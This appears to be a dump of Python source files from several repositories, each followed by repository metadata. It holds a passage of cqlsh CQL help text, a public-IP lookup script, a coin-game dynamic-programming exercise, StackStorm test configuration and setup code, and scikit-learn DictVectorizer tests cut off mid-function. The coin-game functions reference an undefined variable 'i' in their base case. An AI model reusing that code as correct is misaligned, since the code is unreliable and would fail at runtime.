UPDATE: Updating Counter Columns
UPDATE ... SET name1 = name1 + <value> ...
UPDATE ... SET name1 = name1 - <value> ...
Counter columns can be incremented or decremented by an arbitrary
numeric value though the assignment of an expression that adds or
subtracts the value.
"""
def help_update_where(self):
print """
UPDATE: Selecting rows to update
UPDATE ... WHERE <keyname> = <keyval>;
UPDATE ... WHERE <keyname> IN (<keyval1>, <keyval2>, ...);
UPDATE ... WHERE <keycol1> = <keyval1> AND <keycol2> = <keyval2>;
Each update statement requires a precise set of keys to be specified
using a WHERE clause.
If the table's primary key consists of multiple columns, an explicit
value must be given for each for the UPDATE statement to make sense.
"""
def help_select_table(self):
print """
SELECT: Specifying Table
SELECT ... FROM [<keyspace>.]<tablename> ...
The FROM clause is used to specify the CQL table applicable to a SELECT
query. The keyspace in which the table exists can optionally be
specified along with the table name, separated by a dot (.). This will
not change the current keyspace of the session (see HELP USE).
"""
help_select_columnfamily = help_select_table
def help_select_where(self):
print """
SELECT: Filtering rows
SELECT ... WHERE <key> = keyname AND name1 = value1
SELECT ... WHERE <key> >= startkey and <key> =< endkey AND name1 = value1
SELECT ... WHERE <key> IN ('<key>', '<key>', '<key>', ...)
The WHERE clause provides for filtering the rows that appear in
results. The clause can filter on a key name, or range of keys, and in
the case of indexed columns, on column values. Key filters are
specified using the KEY keyword or key alias name, a relational
operator (one of =, >, >=, <, and <=), and a term value. When terms
appear on both sides of a relational operator it is assumed the filter
applies to an indexed column. With column index filters, the term on
the left of the operator is the name, the term on the right is the
value to filter _on_.
Note: The greater-than and less-than operators (> and <) result in key
ranges that are inclusive of the terms. There is no supported notion of
"strictly" greater-than or less-than; these operators are merely
supported as aliases to >= and <=.
"""
def help_select_limit(self):
print """
SELECT: Limiting results
SELECT ... WHERE <clause> [LIMIT n] ...
Limiting the number of rows returned can be achieved by adding the
LIMIT option to a SELECT expression. LIMIT defaults to 10,000 when left
unset.
"""
class CQL3HelpTopics(CQLHelpTopics):
def help_create_keyspace(self):
print """
CREATE KEYSPACE <ksname>
WITH replication = {'class':'<strategy>' [,'<option>':<val>]};
The CREATE KEYSPACE statement creates a new top-level namespace (aka
"keyspace"). Valid names are any string constructed of alphanumeric
characters and underscores. Names which do not work as valid
identifiers or integers should be quoted as string literals. Properties
such as replication strategy and count are specified during creation
as key-value pairs in the 'replication' map:
class [required]: The name of the replication strategy class
which should be used for the new keyspace. Some often-used classes
are SimpleStrategy and NetworkTopologyStrategy.
other options [optional]: Most strategies require additional arguments
which can be supplied as key-value pairs in the 'replication' map.
Examples:
To create a keyspace with NetworkTopologyStrategy and strategy option of "DC1"
with a value of "1" and "DC2" with a value of "2" you would use
the following statement:
CREATE KEYSPACE <ksname>
WITH replication = {'class':'NetworkTopologyStrategy', 'DC1':1, 'DC2':2};
To create a keyspace with SimpleStrategy and "replication_factor" option
with a value of "3" you would use this statement:
CREATE KEYSPACE <ksname>
WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};
"""
def help_begin(self):
print """
BEGIN [UNLOGGED|COUNTER] BATCH [USING TIMESTAMP <timestamp>]
<insert or update or delete statement> ;
[ <another insert or update or delete statement ;
[...]]
APPLY BATCH;
BATCH supports setting a client-supplied optional global timestamp
which will be used for each of the operations included in the batch.
Only data modification statements (specifically, UPDATE, INSERT,
and DELETE) are allowed in a BATCH statement. BATCH is _not_ an
analogue for SQL transactions.
_NOTE: Counter mutations are allowed only within COUNTER batches._
_NOTE: While there are no isolation guarantees, UPDATE queries are
atomic within a given record._
"""
help_apply = help_begin
def help_select(self):
print """
SELECT <selectExpr>
FROM [<keyspace>.]<table>
[WHERE <clause>]
[ORDER BY <colname> [DESC]]
[LIMIT m];
SELECT is used to read one or more records from a CQL table. It returns
a set of rows matching the selection criteria specified.
For more information, see one of the following:
HELP SELECT_EXPR
HELP SELECT_TABLE
HELP SELECT_WHERE
HELP SELECT_LIMIT
"""
def help_delete(self):
print """
DELETE [<col1> [, <col2>, ...] FROM [<keyspace>.]<tablename>
[USING TIMESTAMP <timestamp>]
WHERE <keyname> = <keyvalue>;
A DELETE is used to perform the removal of one or more columns from one
or more rows. Each DELETE statement requires a precise set of row keys
to be specified using a WHERE clause and the KEY keyword or key alias.
For more information, see one of the following:
HELP DELETE_USING
HELP DELETE_COLUMNS
HELP DELETE_WHERE
"""
def help_delete_using(self):
print """
DELETE: the USING clause
DELETE ... USING TIMESTAMP <timestamp>;
<timestamp> defines the optional timestamp for the new tombstone
record. It must be an integer. Cassandra timestamps are generally
specified using milliseconds since the Unix epoch (1970-01-01 00:00:00
UTC).
"""
def help_update(self):
print """
UPDATE [<keyspace>.]<columnFamily>
[USING [TIMESTAMP <timestamp>]
[AND TTL <timeToLive>]]
SET name1 = value1, name2 = value2 WHERE <keycol> = keyval;
An UPDATE is used to write one or more columns to a record in a table.
No results are returned. The record's primary key must be completely
and uniquely specified; that is, if the primary key includes multiple
columns, all must be explicitly given in the WHERE clause.
Statements begin with the UPDATE keyword followed by the name of the
table to be updated.
For more information, see one of the following:
HELP UPDATE_USING
HELP UPDATE_SET
HELP UPDATE_COUNTERS
HELP UPDATE_WHERE
"""
def help_update_using(self):
print """
UPDATE: the USING clause
UPDATE ... USING TIMESTAMP <timestamp>;
UPDATE ... USING TTL <timeToLive>;
The USING clause allows setting of certain query and data parameters.
If multiple parameters need to be set, these may be joined using AND.
Example:
UPDATE ... USING TTL 43200 AND TIMESTAMP 1351620509603
<timestamp> defines the optional timestamp for the new column value(s).
It must be an integer. Cassandra timestamps are generally specified
using milliseconds since the Unix epoch (1970-01-01 00:00:00 UTC).
<timeToLive> defines the optional time to live (TTL) in seconds for the
new column value(s). It must be an integer.
"""
def help_insert(self):
print """
INSERT INTO [<keyspace>.]<tablename>
( <colname1>, <colname2> [, <colname3> [, ...]] )
VALUES ( <colval1>, <colval2> [, <colval3> [, ...]] )
[USING TIMESTAMP <timestamp>]
[AND TTL <timeToLive>];
An INSERT is used to write one or more columns to a record in a
CQL table. No results are returned.
Values for all component columns in the table's primary key must
be given. Also, there must be at least one non-primary-key column
specified (Cassandra rows are not considered to exist with only
a key and no associated columns).
Unlike in SQL, the semantics of INSERT and UPDATE are identical.
In either case a record is created if none existed before, and
udpated when it does. For more information, see one of the
following:
HELP UPDATE
HELP UPDATE_USING
"""
def help_select_expr(self):
print """
SELECT: Specifying Columns
SELECT name1, name2, name3 FROM ...
SELECT COUNT(*) FROM ...
The SELECT expression determines which columns will appear in the
results and takes the form of a comma separated list of names.
It is worth noting that unlike the projection in a SQL SELECT, there is
no guarantee that the results will contain all of the columns
specified. This is because Cassandra is schema-less and there are no
guarantees that a given column exists.
When the COUNT aggregate function is specified as a column to fetch, a
single row will be returned, with a single column named "count" whose
value is the number of rows from the pre-aggregation resultset.
Currently, COUNT is the only function supported by CQL.
"""
def help_alter_drop(self):
print """
ALTER TABLE: dropping a typed column
ALTER TABLE addamsFamily DROP gender;
An ALTER TABLE ... DROP statement removes the type of a column
from the column family metadata. Dropped columns will immediately
become unavailable in the queries and will not be included in
compacted sstables in the future. If a column is readded, queries
won't return values written before the column was last dropped.
It is assumed that timestamps represent actual time, so if this
is not your case, you should NOT readd previously dropped columns.
Columns can't be dropped from tables defined with COMPACT STORAGE.
"""
def help_create(self):
super(CQL3HelpTopics, self).help_create()
print " HELP CREATE_USER;\n"
def help_alter(self):
print """
ALTER TABLE <tablename> ALTER <columnname> TYPE <type>;
ALTER TABLE <tablename> ADD <columnname> <type>;
ALTER TABLE <tablename> RENAME <columnname> TO <columnname>
[AND <columnname> TO <columnname>]
ALTER TABLE <tablename> WITH <optionname> = <val> [AND <optionname> = <val> [...]];
An ALTER statement is used to manipulate table metadata. It allows you
to add new typed columns, drop existing columns, change the data
storage type of existing columns, or change table properties.
No results are returned.
See one of the following for more information:
HELP ALTER_ALTER;
HELP ALTER_ADD;
HELP ALTER_DROP;
HELP ALTER_RENAME;
HELP ALTER_WITH;
"""
def help_alter_rename(self):
print """
ALTER TABLE: renaming a column
ALTER TABLE <tablename> RENAME <columnname> TO <columnname>
[AND <columnname> TO <columnname>]
The ALTER TABLE ... RENAME variant renames a typed column in a column
family.
"""
def help_drop(self):
super(CQL3HelpTopics, self).help_drop()
print " HELP DROP_USER;\n"
def help_list(self):
print """
There are different variants of LIST. For more information, see
one of the following:
HELP LIST_USERS;
HELP LIST_PERMISSIONS;
"""
def help_create_user(self):
print """
CREATE USER <username> [WITH PASSWORD 'password'] [NOSUPERUSER | SUPERUSER];
CREATE USER creates a new Cassandra user account.
Only superusers can issue CREATE USER requests.
To create a superuser account use SUPERUSER option (NOSUPERUSER is the default).
WITH PASSWORD clause should only be used with password-based authenticators,
e.g. PasswordAuthenticator, SimpleAuthenticator.
"""
def help_alter_user(self):
print """
ALTER USER <username> [WITH PASSWORD 'password'] [NOSUPERUSER | SUPERUSER];
Use ALTER USER to change a user's superuser status and/or password (only
with password-based authenticators).
Superusers can change a user's password or superuser status (except their own).
Users cannot change their own superuser status. Ordinary users can only change their
password (if the configured authenticator is password-based).
"""
def help_drop_user(self):
print """
DROP USER <username>;
DROP USER removes an existing user. You have to be logged in as a superuser
to issue a DROP USER statement. A user cannot drop themselves.
"""
def help_list_users(self):
print """
LIST USERS;
List existing users and their superuser status.
"""
def help_grant(self):
print """
GRANT (<permission> [PERMISSION] | ALL [PERMISSIONS])
ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>
TO <username>
Grant the specified permission (or all permissions) on a resource
to a user.
To be able to grant a permission on some resource you have to
have that permission yourself and also AUTHORIZE permission on it,
or on one of its parent resources.
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_revoke(self):
print """
REVOKE (<permission> [PERMISSION] | ALL [PERMISSIONS])
ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>
FROM <username>
Revokes the specified permission (or all permissions) on a resource
from a user.
To be able to revoke a permission on some resource you have to
have that permission yourself and also AUTHORIZE permission on it,
or on one of its parent resources.
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_list_permissions(self):
print """
LIST (<permission> [PERMISSION] | ALL [PERMISSIONS])
[ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>]
[OF <username>]
[NORECURSIVE]
Omitting ON <resource> part will list permissions on ALL KEYSPACES,
every keyspace and table.
Omitting OF <username> part will list permissions of all users.
Omitting NORECURSIVE specifier will list permissions of the resource
and all its parents (table, table's keyspace and ALL KEYSPACES).
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_permissions(self):
print """
PERMISSIONS
Cassandra has 6 permissions:
ALTER: required for ALTER KEYSPCE, ALTER TABLE, CREATE INDEX, DROP INDEX
AUTHORIZE: required for GRANT, REVOKE
CREATE: required for CREATE KEYSPACE, CREATE TABLE
DROP: required for DROP KEYSPACE, DROP TABLE
MODIFY: required for INSERT, DELETE, UPDATE, TRUNCATE
SELECT: required for SELECT
"""
|
guanxi55nba/db-improvement
|
pylib/cqlshlib/helptopics.py
|
Python
|
apache-2.0
| 30,976
|
#!/usr/bin/env python
import re,urllib2
class Get_public_ip:
def getip(self):
try:
myip = self.visit("http://ip.chinaz.com/getip.aspx")
except:
try:
myip = self.visit("http://ipv4.icanhazip.com/")
except:
myip = "So sorry!!!"
return myip
def visit(self,url):
opener = urllib2.urlopen(url)
if url == opener.geturl():
str = opener.read()
return re.search('\d+\.\d+\.\d+\.\d+',str).group(0)
if __name__ == "__main__":
getmyip = Get_public_ip()
print getmyip.getip()
|
PoplarYang/oneinstack-odm
|
include/get_public_ipaddr.py
|
Python
|
apache-2.0
| 536
|
# Consider a row of n coins of values v1 . . . vn, where n is even.
# We play a game against an opponent by alternating turns. In each turn,
# a player selects either the first or last coin from the row, removes it
# from the row permanently, and receives the value of the coin. Determine the
# maximum possible amount of money we can definitely win if we move first.
# Note: The opponent is as clever as the user.
# http://www.geeksforgeeks.org/dynamic-programming-set-31-optimal-strategy-for-a-game/
def find_max_val_recur(coins,l,r):
if l + 1 == r:
return max(coins[l],coins[r])
if l == r:
return coins[i]
left_choose = coins[l] + min(find_max_val_recur(coins,l+1,r - 1),find_max_val_recur(coins,l+2,r))
right_choose = coins[r] + min(find_max_val_recur(coins,l + 1,r-1),find_max_val_recur(coins,l,r-2))
return max(left_choose,right_choose)
coin_map = {}
def find_max_val_memo(coins,l,r):
if l + 1 == r:
return max(coins[l],coins[r])
if l == r:
return coins[i]
if (l,r) in coin_map:
return coin_map[(l,r)]
left_choose = coins[l] + min(find_max_val_memo(coins,l+1,r - 1),find_max_val_memo(coins,l+2,r))
right_choose = coins[r] + min(find_max_val_memo(coins,l + 1,r-1),find_max_val_memo(coins,l,r-2))
max_val = max(left_choose,right_choose)
coin_map[(l,r)] = max_val
return max_val
def find_max_val_bottom_up(coins):
coins_len = len(coins)
table = [[0] * coins_len for i in range(coins_len + 1)]
for gap in range(coins_len):
i = 0
for j in range(gap,coins_len):
# Here x is value of F(i+2, j), y is F(i+1, j-1) and
# z is F(i, j-2) in above recursive formula
x = table[i+2][j] if (i+2) <= j else 0
y = table[i+1][j-1] if (i+1) <= (j-1) else 0
z = table[i][j-2] if i <= (j-2) else 0
table[i][j] = max(coins[i] + min(x,y),coins[j] + min(y,z))
i += 1
return table[0][coins_len - 1]
if __name__=="__main__":
coins = [8,15,3,7]
print(find_max_val_bottom_up(coins))
|
bkpathak/Algorithms-collections
|
src/DP/coin_play.py
|
Python
|
apache-2.0
| 2,084
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
from oslo_config import cfg, types
from st2common import log as logging
import st2common.config as common_config
from st2common.constants.system import DEFAULT_CONFIG_FILE_PATH
from st2common.constants.garbage_collection import DEFAULT_COLLECTION_INTERVAL
from st2common.constants.garbage_collection import DEFAULT_SLEEP_DELAY
from st2common.constants.sensors import DEFAULT_PARTITION_LOADER
from st2tests.fixturesloader import get_fixtures_packs_base_path
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# Ued for tests. For majority of tests, we want this value to be False.
USE_DEFAULT_CONFIG_FILES = False
def reset():
cfg.CONF.reset()
def parse_args(args=None, coordinator_noop=True):
_setup_config_opts(coordinator_noop=coordinator_noop)
kwargs = {}
if USE_DEFAULT_CONFIG_FILES:
kwargs["default_config_files"] = [DEFAULT_CONFIG_FILE_PATH]
cfg.CONF(args=args or [], **kwargs)
def _setup_config_opts(coordinator_noop=True):
reset()
try:
_register_config_opts()
except Exception as e:
print(e)
# Some scripts register the options themselves which means registering them again will
# cause a non-fatal exception
return
_override_config_opts(coordinator_noop=coordinator_noop)
def _override_config_opts(coordinator_noop=False):
_override_db_opts()
_override_common_opts()
_override_api_opts()
_override_keyvalue_opts()
_override_scheduler_opts()
_override_workflow_engine_opts()
_override_coordinator_opts(noop=coordinator_noop)
def _register_config_opts():
_register_common_opts()
_register_api_opts()
_register_stream_opts()
_register_auth_opts()
_register_action_sensor_opts()
_register_ssh_runner_opts()
_register_scheduler_opts()
_register_exporter_opts()
_register_sensor_container_opts()
_register_garbage_collector_opts()
def _override_db_opts():
CONF.set_override(name="db_name", override="st2-test", group="database")
CONF.set_override(name="host", override="127.0.0.1", group="database")
def _override_common_opts():
packs_base_path = get_fixtures_packs_base_path()
CONF.set_override(name="base_path", override=packs_base_path, group="system")
CONF.set_override(name="validate_output_schema", override=True, group="system")
CONF.set_override(
name="system_packs_base_path", override=packs_base_path, group="content"
)
CONF.set_override(
name="packs_base_paths", override=packs_base_path, group="content"
)
CONF.set_override(name="api_url", override="http://127.0.0.1", group="auth")
CONF.set_override(name="mask_secrets", override=True, group="log")
CONF.set_override(name="stream_output", override=False, group="actionrunner")
def _override_api_opts():
CONF.set_override(
name="allow_origin",
override=["http://127.0.0.1:3000", "http://dev"],
group="api",
)
def _override_keyvalue_opts():
current_file_path = os.path.dirname(__file__)
rel_st2_base_path = os.path.join(current_file_path, "../..")
abs_st2_base_path = os.path.abspath(rel_st2_base_path)
rel_enc_key_path = "st2tests/conf/st2_kvstore_tests.crypto.key.json"
ovr_enc_key_path = os.path.join(abs_st2_base_path, rel_enc_key_path)
CONF.set_override(
name="encryption_key_path", override=ovr_enc_key_path, group="keyvalue"
)
def _override_scheduler_opts():
CONF.set_override(name="sleep_interval", group="scheduler", override=0.01)
def _override_coordinator_opts(noop=False):
driver = None if noop else "zake://"
CONF.set_override(name="url", override=driver, group="coordination")
CONF.set_override(name="lock_timeout", override=1, group="coordination")
def _override_workflow_engine_opts():
cfg.CONF.set_override("retry_stop_max_msec", 500, group="workflow_engine")
cfg.CONF.set_override("retry_wait_fixed_msec", 100, group="workflow_engine")
cfg.CONF.set_override("retry_max_jitter_msec", 100, group="workflow_engine")
cfg.CONF.set_override("gc_max_idle_sec", 1, group="workflow_engine")
def _register_common_opts():
try:
common_config.register_opts(ignore_errors=True)
except:
LOG.exception("Common config registration failed.")
def _register_api_opts():
# XXX: note : template_path value only works if started from the top-level of the codebase.
# Brittle!
pecan_opts = [
cfg.StrOpt(
"root",
default="st2api.controllers.root.RootController",
help="Pecan root controller",
),
cfg.StrOpt("template_path", default="%(confdir)s/st2api/st2api/templates"),
cfg.ListOpt("modules", default=["st2api"]),
cfg.BoolOpt("debug", default=True),
cfg.BoolOpt("auth_enable", default=True),
cfg.DictOpt("errors", default={404: "/error/404", "__force_dict__": True}),
]
_register_opts(pecan_opts, group="api_pecan")
api_opts = [
cfg.BoolOpt("debug", default=True),
cfg.IntOpt(
"max_page_size",
default=100,
help="Maximum limit (page size) argument which can be specified by the user in a query "
"string. If a larger value is provided, it will default to this value.",
),
]
_register_opts(api_opts, group="api")
messaging_opts = [
cfg.StrOpt(
"url",
default="amqp://guest:guest@127.0.0.1:5672//",
help="URL of the messaging server.",
),
cfg.ListOpt(
"cluster_urls",
default=[],
help="URL of all the nodes in a messaging service cluster.",
),
cfg.IntOpt(
"connection_retries",
default=10,
help="How many times should we retry connection before failing.",
),
cfg.IntOpt(
"connection_retry_wait",
default=10000,
help="How long should we wait between connection retries.",
),
cfg.BoolOpt(
"ssl",
default=False,
help="Use SSL / TLS to connect to the messaging server. Same as "
'appending "?ssl=true" at the end of the connection URL string.',
),
cfg.StrOpt(
"ssl_keyfile",
default=None,
help="Private keyfile used to identify the local connection against RabbitMQ.",
),
cfg.StrOpt(
"ssl_certfile",
default=None,
help="Certificate file used to identify the local connection (client).",
),
cfg.StrOpt(
"ssl_cert_reqs",
default=None,
choices="none, optional, required",
help="Specifies whether a certificate is required from the other side of the "
"connection, and whether it will be validated if provided.",
),
cfg.StrOpt(
"ssl_ca_certs",
default=None,
help="ca_certs file contains a set of concatenated CA certificates, which are "
"used to validate certificates passed from RabbitMQ.",
),
cfg.StrOpt(
"login_method",
default=None,
help="Login method to use (AMQPLAIN, PLAIN, EXTERNAL, etc.).",
),
]
_register_opts(messaging_opts, group="messaging")
ssh_runner_opts = [
cfg.StrOpt(
"remote_dir",
default="/tmp",
help="Location of the script on the remote filesystem.",
),
cfg.BoolOpt(
"allow_partial_failure",
default=False,
help="How partial success of actions run on multiple nodes should be treated.",
),
cfg.BoolOpt(
"use_ssh_config",
default=False,
help="Use the .ssh/config file. Useful to override ports etc.",
),
]
_register_opts(ssh_runner_opts, group="ssh_runner")
def _register_stream_opts():
stream_opts = [
cfg.IntOpt(
"heartbeat",
default=25,
help="Send empty message every N seconds to keep connection open",
),
cfg.BoolOpt("debug", default=False, help="Specify to enable debug mode."),
]
_register_opts(stream_opts, group="stream")
def _register_auth_opts():
auth_opts = [
cfg.StrOpt("host", default="127.0.0.1"),
cfg.IntOpt("port", default=9100),
cfg.BoolOpt("use_ssl", default=False),
cfg.StrOpt("mode", default="proxy"),
cfg.StrOpt("backend", default="flat_file"),
cfg.StrOpt("backend_kwargs", default=None),
cfg.StrOpt("logging", default="conf/logging.conf"),
cfg.IntOpt("token_ttl", default=86400, help="Access token ttl in seconds."),
cfg.BoolOpt("sso", default=True),
cfg.StrOpt("sso_backend", default="noop"),
cfg.StrOpt("sso_backend_kwargs", default=None),
cfg.BoolOpt("debug", default=True),
]
_register_opts(auth_opts, group="auth")
def _register_action_sensor_opts():
action_sensor_opts = [
cfg.BoolOpt(
"enable",
default=True,
help="Whether to enable or disable the ability to post a trigger on action.",
),
cfg.StrOpt(
"triggers_base_url",
default="http://127.0.0.1:9101/v1/triggertypes/",
help="URL for action sensor to post TriggerType.",
),
cfg.IntOpt(
"request_timeout",
default=1,
help="Timeout value of all httprequests made by action sensor.",
),
cfg.IntOpt(
"max_attempts", default=10, help="No. of times to retry registration."
),
cfg.IntOpt(
"retry_wait",
default=1,
help="Amount of time to wait prior to retrying a request.",
),
]
_register_opts(action_sensor_opts, group="action_sensor")
def _register_ssh_runner_opts():
ssh_runner_opts = [
cfg.BoolOpt(
"use_ssh_config",
default=False,
help="Use the .ssh/config file. Useful to override ports etc.",
),
cfg.StrOpt(
"remote_dir",
default="/tmp",
help="Location of the script on the remote filesystem.",
),
cfg.BoolOpt(
"allow_partial_failure",
default=False,
help="How partial success of actions run on multiple nodes should be treated.",
),
cfg.IntOpt(
"max_parallel_actions",
default=50,
help="Max number of parallel remote SSH actions that should be run. "
"Works only with Paramiko SSH runner.",
),
]
_register_opts(ssh_runner_opts, group="ssh_runner")
def _register_scheduler_opts():
scheduler_opts = [
cfg.FloatOpt(
"execution_scheduling_timeout_threshold_min",
default=1,
help="How long GC to search back in minutes for orphaned scheduled actions",
),
cfg.IntOpt(
"pool_size",
default=10,
help="The size of the pool used by the scheduler for scheduling executions.",
),
cfg.FloatOpt(
"sleep_interval",
default=0.01,
help="How long to sleep between each action scheduler main loop run interval (in ms).",
),
cfg.FloatOpt(
"gc_interval",
default=5,
help="How often to look for zombie executions before rescheduling them (in ms).",
),
cfg.IntOpt(
"retry_max_attempt",
default=3,
help="The maximum number of attempts that the scheduler retries on error.",
),
cfg.IntOpt(
"retry_wait_msec",
default=100,
help="The number of milliseconds to wait in between retries.",
),
]
_register_opts(scheduler_opts, group="scheduler")
def _register_exporter_opts():
exporter_opts = [
cfg.StrOpt(
"dump_dir",
default="/opt/stackstorm/exports/",
help="Directory to dump data to.",
)
]
_register_opts(exporter_opts, group="exporter")
def _register_sensor_container_opts():
partition_opts = [
cfg.StrOpt(
"sensor_node_name", default="sensornode1", help="name of the sensor node."
),
cfg.Opt(
"partition_provider",
type=types.Dict(value_type=types.String()),
default={"name": DEFAULT_PARTITION_LOADER},
help="Provider of sensor node partition config.",
),
]
_register_opts(partition_opts, group="sensorcontainer")
# Other options
other_opts = [
cfg.BoolOpt(
"single_sensor_mode",
default=False,
help="Run in a single sensor mode where parent process exits when a sensor crashes / "
"dies. This is useful in environments where partitioning, sensor process life "
"cycle and failover is handled by a 3rd party service such as kubernetes.",
)
]
_register_opts(other_opts, group="sensorcontainer")
# CLI options
cli_opts = [
cfg.StrOpt(
"sensor-ref",
help="Only run sensor with the provided reference. Value is of the form "
"<pack>.<sensor-name> (e.g. linux.FileWatchSensor).",
),
cfg.BoolOpt(
"single-sensor-mode",
default=False,
help="Run in a single sensor mode where parent process exits when a sensor crashes / "
"dies. This is useful in environments where partitioning, sensor process life "
"cycle and failover is handled by a 3rd party service such as kubernetes.",
),
]
_register_cli_opts(cli_opts)
def _register_garbage_collector_opts():
common_opts = [
cfg.IntOpt(
"collection_interval",
default=DEFAULT_COLLECTION_INTERVAL,
help="How often to check database for old data and perform garbage collection.",
),
cfg.FloatOpt(
"sleep_delay",
default=DEFAULT_SLEEP_DELAY,
help="How long to wait / sleep (in seconds) between "
"collection of different object types.",
),
]
_register_opts(common_opts, group="garbagecollector")
ttl_opts = [
cfg.IntOpt(
"action_executions_ttl",
default=None,
help="Action executions and related objects (live actions, action output "
"objects) older than this value (days) will be automatically deleted.",
),
cfg.IntOpt(
"action_executions_output_ttl",
default=7,
help="Action execution output objects (ones generated by action output "
"streaming) older than this value (days) will be automatically deleted.",
),
cfg.IntOpt(
"trigger_instances_ttl",
default=None,
help="Trigger instances older than this value (days) will be automatically deleted.",
),
]
_register_opts(ttl_opts, group="garbagecollector")
inquiry_opts = [
cfg.BoolOpt(
"purge_inquiries",
default=False,
help="Set to True to perform garbage collection on Inquiries (based on "
"the TTL value per Inquiry)",
)
]
_register_opts(inquiry_opts, group="garbagecollector")
def _register_opts(opts, group=None):
CONF.register_opts(opts, group)
def _register_cli_opts(opts):
cfg.CONF.register_cli_opts(opts)
|
StackStorm/st2
|
st2tests/st2tests/config.py
|
Python
|
apache-2.0
| 16,363
|
# -*- coding: utf-8 -*-
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os.path
from setuptools import setup, find_packages
from dist_utils import fetch_requirements
from dist_utils import apply_vagrant_workaround
from st2actions import __version__
ST2_COMPONENT = "st2actions"
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
REQUIREMENTS_FILE = os.path.join(BASE_DIR, "requirements.txt")
install_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)
apply_vagrant_workaround()
setup(
name=ST2_COMPONENT,
version=__version__,
description="{} StackStorm event-driven automation platform component".format(
ST2_COMPONENT
),
author="StackStorm",
author_email="info@stackstorm.com",
license="Apache License (2.0)",
url="https://stackstorm.com/",
install_requires=install_reqs,
dependency_links=dep_links,
test_suite=ST2_COMPONENT,
zip_safe=False,
include_package_data=True,
packages=find_packages(exclude=["setuptools", "tests"]),
scripts=[
"bin/st2actionrunner",
"bin/st2notifier",
"bin/st2workflowengine",
"bin/st2scheduler",
],
)
|
StackStorm/st2
|
st2actions/setup.py
|
Python
|
apache-2.0
| 1,772
|
# Authors: Lars Buitinck
# Dan Blanchard <dblanchard@ets.org>
# License: BSD 3 clause
from random import Random
import numpy as np
import scipy.sparse as sp
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
import pytest
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectKBest, chi2
@pytest.mark.parametrize("sparse", (True, False))
@pytest.mark.parametrize("dtype", (int, np.float32, np.int16))
@pytest.mark.parametrize("sort", (True, False))
@pytest.mark.parametrize("iterable", (True, False))
def test_dictvectorizer(sparse, dtype, sort, iterable):
D = [{"foo": 1, "bar": 3}, {"bar": 4, "baz": 2}, {"bar": 1, "quux": 1, "quuux": 2}]
v = DictVectorizer(sparse=sparse, dtype=dtype, sort=sort)
X = v.fit_transform(iter(D) if iterable else D)
assert sp.issparse(X) == sparse
assert X.shape == (3, 5)
assert X.sum() == 14
assert v.inverse_transform(X) == D
if sparse:
# CSR matrices can't be compared for equality
assert_array_equal(X.A, v.transform(iter(D) if iterable else D).A)
else:
assert_array_equal(X, v.transform(iter(D) if iterable else D))
if sort:
assert v.feature_names_ == sorted(v.feature_names_)
def test_feature_selection():
# make two feature dicts with two useful features and a bunch of useless
# ones, in terms of chi2
d1 = dict([("useless%d" % i, 10) for i in range(20)], useful1=1, useful2=20)
d2 = dict([("useless%d" % i, 10) for i in range(20)], useful1=20, useful2=1)
for indices in (True, False):
v = DictVectorizer().fit([d1, d2])
X = v.transform([d1, d2])
sel = SelectKBest(chi2, k=2).fit(X, [0, 1])
v.restrict(sel.get_support(indices=indices), indices=indices)
assert v.get_feature_names() == ["useful1", "useful2"]
def test_one_of_k():
D_in = [
{"version": "1", "ham": 2},
{"version": "2", "spam": 0.3},
{"version=3": True, "spam": -1},
]
v = DictVectorizer()
X = v.fit_transform(D_in)
assert X.shape == (3, 5)
D_out = v.inverse_transform(X)
assert D_out[0] == {"version=1": 1, "ham": 2}
names = v.get_feature_names()
assert "version=2" in names
assert "version" not in names
def test_iterable_value():
D_names = ["ham", "spam", "version=1", "version=2", "version=3"]
X_expected = [
[2.0, 0.0, 2.0, 1.0, 0.0],
[0.0, 0.3, 0.0, 1.0, 0.0],
[0.0, -1.0, 0.0, 0.0, 1.0],
]
D_in = [
{"version": ["1", "2", "1"], "ham": 2},
{"version": "2", "spam": 0.3},
{"version=3": True, "spam": -1},
]
v = DictVectorizer()
X = v.fit_transform(D_in)
X = X.toarray()
assert_array_equal(X, X_expected)
D_out = v.inverse_transform(X)
assert D_out[0] == {"version=1": 2, "version=2": 1, "ham": 2}
names = v.get_feature_names()
assert names == D_names
def test_iterable_not_string_error():
error_value = (
"Unsupported type <class 'int'> in iterable value. "
"Only iterables of string are supported."
)
D2 = [{"foo": "1", "bar": "2"}, {"foo": "3", "baz": "1"}, {"foo": [1, "three"]}]
v = DictVectorizer(sparse=False)
with pytest.raises(TypeError) as error:
v.fit(D2)
assert str(error.value) == error_value
def test_mapping_error():
error_value = (
"Unsupported value type <class 'dict'> "
"for foo: {'one': 1, 'three': 3}.\n"
"Mapping objects are not supported."
)
D2 = [
{"foo": "1", "bar": "2"},
{"foo": "3", "baz": "1"},
{"foo": {"one": 1, "three": 3}},
]
v = DictVectorizer(sparse=False)
with pytest.raises(TypeError) as error:
v.fit(D2)
